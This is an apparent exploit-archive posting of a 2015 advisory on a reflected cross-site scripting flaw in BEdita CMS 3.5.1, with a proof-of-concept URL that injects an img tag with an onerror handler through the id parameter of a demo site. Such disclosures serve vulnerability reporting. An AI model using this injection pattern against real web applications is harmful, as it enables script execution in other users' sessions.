Home / exploitsPDF  

BEdita CMS 3.5.1 Cross Site Scripting

Posted on 04 March 2015

# Affected software: BEdita CMS # Type of vulnerability: cross site scripting # URL: bedita.com # Discovered by: Provensec # Website: http://www.provensec.com # Description: *BEdita* is a web development *framework* that comes with a full featured CMS out of the box. # Proof of concept javascript executes on login page if you not logged in or no session initiated other wise javascript on respected page only http://i.imgur.com/1wU6lX7.png http://manage.demo.bedita.com/documents/index/id:%22%3E%3Cimg%20src=d%20onerror=confirm%281%29;%3E

 

TOP